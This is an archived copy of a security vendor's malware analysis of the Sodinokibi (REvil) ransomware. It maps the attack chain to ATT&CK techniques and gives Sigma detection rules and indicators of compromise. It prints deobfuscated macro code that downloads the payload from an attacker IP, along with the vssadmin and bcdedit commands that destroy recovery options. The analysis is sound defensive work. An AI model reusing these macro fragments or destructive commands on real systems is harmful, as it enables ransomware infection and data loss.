{
	"id": "344dfb8f-0471-4cca-99c9-1aec3cdd3191",
	"created_at": "2026-04-06T00:06:25.889593Z",
	"updated_at": "2026-04-10T03:21:36.090106Z",
	"deleted_at": null,
	"sha1_hash": "dd6d51dfe5789131e197f87173f972fd4915401a",
	"title": "A brief history and further technical analysis of Sodinokibi Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1404251,
	"plain_text": "A brief history and further technical analysis of Sodinokibi Ransomware\r\nBy Suleyman Ozarslan, PhD\r\nPublished: 2020-01-14 · Archived: 2026-04-02 10:48:45 UTC\r\nSodinokibi ransomware, also known as REvil or Sodin, has been responsible for a series of high-profile\r\nattacks since April 2019:\r\nhttps://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware\r\nPage 1 of 16\n\nPicus is designed to simulate adversarial Tactics, Techniques and Procedures (TTPs) on endpoints by mimicking\r\nmalware activities without adversely affecting endpoint systems. In this way, emergent and prevalent APT and\r\nmalware threats are reverse-engineered and malware actions are analyzed to build endpoint threat scenarios. Each\r\naction, as an attack technique, is mapped to MITRE’s ATT\u0026CK (Adversarial Tactics, Techniques, and Common\r\nKnowledge) framework. The remaining part of this article analyzes a Sodinokibi sample with reference to\r\nATT\u0026CK tactics and techniques.\r\nInitial Access\r\nSpearphishing Attachment (ATT\u0026CK T1193) is one of the Initial Access techniques most used by\r\nransomware families, including Sodinokibi. Attackers use spam emails with an attached MS Office Word document\r\nincluding a malicious macro to download the ransomware to the target system. In order to show the lifecycle of\r\nSodinokibi ransomware, we analyzed a Microsoft Word document. The specific sample analyzed below is\r\nBewerbungsunterlagen_6704760.doc (SHA-256:\r\nfb8b03748b617acf0ee3b138c5b37e74ec396bc73da3362d633862d7283742fd, detection rate is only 33/60 as of\r\ntoday). Even though Sodinokibi uses the simple obfuscation techniques mentioned below, 30 of 60 antiviruses cannot\r\ndetect it. 
“Bewerbungsunterlagen” means “application document” in German, and the attackers used a CV theme\r\nto lure victims into downloading the document. Sodinokibi is a Ransomware-as-a-Service (RaaS) malware, so\r\nits distribution methods vary depending on the attacker distributing it. Attackers have used the following Initial\r\nAccess techniques in their other campaigns to deliver Sodinokibi:\r\nExploit Public-Facing Application (ATT\u0026CK T1190): Attackers exploit vulnerabilities in enterprise\r\napplications to distribute it, such as the deserialization vulnerability CVE-2019-2725 in Oracle WebLogic\r\nServer, which has a CVSS score of 9.8/10.\r\nRemote Desktop Protocol (ATT\u0026CK T1076): Attackers use RDP to deliver Sodinokibi. This delivery\r\ntechnique can also be classified as External Remote Services (ATT\u0026CK T1133).\r\nSupply Chain Compromise (ATT\u0026CK T1195): Sodinokibi ransomware was distributed through a\r\ncompromised version of WinRAR downloaded from the WinRAR Italia website.\r\nDrive-by Compromise (ATT\u0026CK T1189): Attackers compromised WordPress sites and injected\r\nJavaScript over the content of the original site to spread Sodinokibi.\r\nWhen a victim opens the document, Microsoft Word asks whether to enable macros. 
This reveals that a macro is\r\nembedded in the document (Scripting, ATT\u0026CK T1054).\r\nThe malicious document claims that it was created in an earlier version of Microsoft Office and asks the victim to\r\nenable the content, which launches the code hidden in the macros.\r\nDefense Evasion\r\nWhen we examined the macros in the document, we saw that the VBA (Visual Basic for Applications) code was split\r\ninto modules and functions for the purpose of obfuscation (Obfuscated Files or Information, ATT\u0026CK T1027).\r\nFunction fP1()\r\n    v1 = 465\r\n    Select Case v1\r\n        Case 1 To 5\r\n            fP1 = \"hello\"\r\n        Case 6, 7, 8\r\n            fP1 = \"hello2\"\r\n        Case 9 To 10\r\n            fP1 = \"hello3\"\r\n        Case Else\r\n            fP1 = \"C:\\\\Windows\" \u0026 fP2 \u0026 fP3\r\n    End Select\r\nEnd Function\r\n\r\nFunction fP2()\r\n    fP2 = \"\\\\Te\"\r\nEnd Function\r\n\r\nFunction fP3()\r\n    fP3 = \"mp\\\\MicrosoftOfficeWord_upd.v.88735.34.5\" + \".\" + \"exe\"\r\nEnd Function\r\n\r\nWe combined the above functions and revealed that fP1 =\r\n\"C:\\\\Windows\\\\Temp\\\\MicrosoftOfficeWord_upd.v.88735.34.5.exe\".\r\nFunction fP1()\r\n    v1 = 345\r\n    Select Case v1\r\n        Case 1 To 5\r\n            fP1 = \"hello\"\r\n        Case 6, 7, 8\r\n            fP1 = \"hello2\"\r\n        Case 9 To 10\r\n            fP1 = \"hello3\"\r\n        Case Else\r\n            fU1 = fU2(Array(10, 20, 30))\r\n    End Select\r\nEnd Function\r\n\r\nFunction fU2(v1)\r\n    If IsArray(v1) = True Then\r\n        fU2 = \"hxxp://54.39.233.132/de1.trp\"\r\n    Else\r\n        fU2 = \"hello\"\r\n    End If\r\nEnd Function\r\n\r\nAccording to the above functions, fU1 = \"hxxp://54.39.233.132/de1.trp\".\r\nAs we know the fU1 and fP1 parameters, we can 
understand the following function:\r\nFunction fD2(v1 As Integer, v2 As Integer)\r\n    If v1 = v2 Then\r\n        fD2 = URLDownloadToFile(0, fU1, fP1, 0, 0)\r\n    Else\r\n        fD2 = 123\r\n    End If\r\nEnd Function\r\n\r\nThe URLDownloadToFile function downloads bits from the Internet and saves them to a file. Let’s put the values\r\nwe obtained into this function:\r\nURLDownloadToFile(0, hxxp://54.39.233.132/de1.trp,\r\nC:\\\\Windows\\\\Temp\\\\MicrosoftOfficeWord_upd.v.88735.34.5.exe, 0, 0)\r\nThe second parameter (fU1) is a string value that contains the URL to download, and the third parameter (fP1) is a\r\nstring value containing the name or full path of the file to create for the download. Accordingly, this function\r\ndownloads de1.trp from 54.39.233.132 and saves it to the C:\\Windows\\Temp\\ directory as\r\nMicrosoftOfficeWord_upd.v.88735.34.5.exe.\r\nThe downloaded file is the Sodinokibi ransomware (SHA-256:\r\n720fbe60f049848f02ba9b2b91926f80ba65b84f0d831a55f4e634c820bd0848, detection rate is 51/69 as of today).\r\nIts artifacts usually mimic the names of known executables for Defense Evasion, such as the Microsoft Word update\r\nfile name (MicrosoftOfficeWord_upd.v.88735.34.5.exe) in this sample (Masquerading, ATT\u0026CK T1036).\r\nExecution\r\nAs seen in the above process graph, the macro in the Word document downloads and runs the Sodinokibi executable.\r\nAfter execution, it runs the following command using cmd.exe (Command-Line Interface, ATT\u0026CK T1059):\r\n\"C:\\Windows\\System32\\cmd.exe\" /c vssadmin.exe Delete Shadows /All /Quiet \u0026 bcdedit /set\r\n\r\nAt first, this command runs vssadmin.exe to delete all volume shadow copies on the system to prevent\r\nrecovery (Inhibit System Recovery, ATT\u0026CK T1490):\r\nvssadmin.exe Delete Shadows /All /Quiet\r\n\r\nThen, it uses bcdedit.exe twice to disable automatic Windows recovery 
features by modifying boot\r\nconfiguration data (Inhibit System Recovery, ATT\u0026CK T1490):\r\nbcdedit /set {default} recoveryenabled No\r\n\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\n\r\nSigma rules detecting the above actions are given in the Appendix.\r\nImpact\r\nLike most ransomware, Sodinokibi encrypts files and adds a random extension, such as “test.jpg.1cd8t9ahd5”\r\n(Data Encrypted for Impact, ATT\u0026CK T1486). It also drops a ransom note in folders that contain encrypted files.\r\nThe name of the ransom note is derived from the random extension added to the encrypted files. For example, if the extension is\r\n\".1cd8t9ahd5\", the ransom note will be named \"1cd8t9ahd5-HOW-TO-DECRYPT.txt\".\r\nThe ransom note recommends accessing the attacker’s website over the TOR browser:\r\nhxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C2D97495C4BA3647\r\nWhen we accessed the website, we saw the following page, which demands 0,6346 Bitcoin, worth $5,000. If you pay the\r\nransom within two days, the cost is halved.\r\nIn the “ABOUT US” section of their website, they claim that they developed the best data encryption and\r\ndecryption system available today. I am sure they did not develop the best encryption method, but they do use\r\nmultiple layers of encryption, encrypting the files and also the private keys. To put it another way, it requires two keys for\r\ndecryption. Sodinokibi uses AES encryption to encrypt the private keys, and Salsa20 for encrypting files. 
As far as\r\nI know, unfortunately there are no decryption tools to restore data encrypted by Sodinokibi ransomware.\r\nCONCLUSION\r\nIn this wave of attacks, Sodinokibi ransomware spreads by spearphishing emails that lure victims into\r\ndownloading a CV-themed Word document, which contains a macro that downloads and executes the ransomware.\r\nCommands in the macro are split into different modules and functions for defense evasion. After infection,\r\nSodinokibi encrypts files and puts a ransom note in folders that contain encrypted files. It also deletes all volume\r\nshadow copies and disables automatic Windows recovery features to inhibit system recovery. Sodinokibi uses very\r\nsimilar infection and execution techniques to the notorious GandCrab ransomware, raising suspicion that it was\r\ndeveloped by the GandCrab authors.\r\nDo you want to know if your current enterprise security controls are blocking these types of attacks? You can\r\nrequest a demo. Don’t hesitate. 
Let us show you how, within just a few hours, we can report to you how\r\nyour network security systems are protecting you against Sodinokibi and other prominent cyber attacks!\r\nAPPENDIX\r\nMITRE’s ATT\u0026CK Techniques Observed\r\nInitial Access: T1189 Drive-by Compromise; T1190 Exploit Public-Facing Application; T1133 External Remote Services; T1193 Spearphishing Attachment; T1195 Supply Chain Compromise\r\nExecution: T1059 Command-Line Interface; T1054 Scripting\r\nPersistence: T1133 External Remote Services\r\nDefense Evasion: T1036 Masquerading; T1054 Scripting\r\nLateral Movement: T1076 Remote Desktop Protocol\r\nImpact: T1486 Data Encrypted for Impact; T1490 Inhibit System Recovery\r\nSigma Rules\r\nInhibit System Recovery by Shadow Copy Deletion via Vssadmin Utility\r\ntitle: Inhibit System Recovery by Shadow Copy Deletion via Vssadmin Utility\r\nstatus: experimental\r\ndescription: Detects the attempt to delete shadow copy via Vssadmin Utility. 
This techn\r\nauthor: Picus Security\r\nreferences:\r\n  - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vss\r\n  - https://attack.mitre.org/techniques/T1490/\r\n  - https://attack.mitre.org/tactics/TA0040/\r\nlogsource:\r\n  product: windows\r\n  service: security\r\n  definition1: 'Requirements: Group Policy : Computer Configuration\\Windows Settings\\S\r\n  definition2: 'Requirements: Group Policy : Computer Configuration\\ Administrative Te\r\ndetection:\r\n  selection:\r\n    EventID: 4688\r\n    NewProcessName: '*\\vssadmin.exe'\r\n    ProcessCommandLine: '*delete shadows*'\r\n  condition: selection\r\nfalsepositives:\r\n  - Legitimate administrative activities\r\nlevel: medium\r\ntags:\r\n  - attack.impact\r\n  - attack.t1490\r\n  - attack.ta0040\r\n\r\nInhibit System Recovery by Disabling Windows Recovery Features via Bcdedit Tool\r\ntitle: Inhibit System Recovery by Disabling Windows Recovery Features via Bcdedit Tool\r\nstatus: experimental\r\ndescription: Detects the attempt to disable Windows recovery features via bcdedit tool\r\nauthor: Picus Security\r\nreferences:\r\n  - https://attack.mitre.org/techniques/T1490/\r\n  - https://attack.mitre.org/tactics/TA0040/\r\nlogsource:\r\n  product: windows\r\n  service: security\r\n  definition1: 'Requirements: Group Policy : Computer Configuration\\Windows Settings\\\r\n  definition2: 'Requirements: Group Policy : Computer Configuration\\ Administrative T\r\ndetection:\r\n  selection:\r\n    EventID: 4688\r\n    NewProcessName: '*\\bcdedit.exe'\r\n    ProcessCommandLine: '*recoveryenabled no*'\r\n  condition: selection\r\nfalsepositives:\r\n  - Legitimate administrative activities\r\nlevel: medium\r\ntags:\r\n  - attack.impact\r\n  - attack.t1490\r\n  - attack.ta0040\r\n\r\nIndicator of 
Compromises (IoC)\r\nDelivery Documents (12)\r\nSodinokibi Executables (55)\r\nDomains (4)\r\nAnmcousa.xyz\r\nBlaerck.xyz\r\ncklinosleeve.icu\r\nfcamylleibrahim.top\r\n\r\nIPs (4)\r\n45.67.14.162\r\n54.39.233.132\r\n185.193.141.248\r\n185.234.218.9\r\n\r\nSource: https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware"
	],
	"report_names": [
		"a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware"
	],
	"threat_actors": [],
	"ts_created_at": 1775433985,
	"ts_updated_at": 1775791296,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.pdf",
		"text": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.txt",
		"img": "https://archive.orkl.eu/dd6d51dfe5789131e197f87173f972fd4915401a.jpg"
	}
}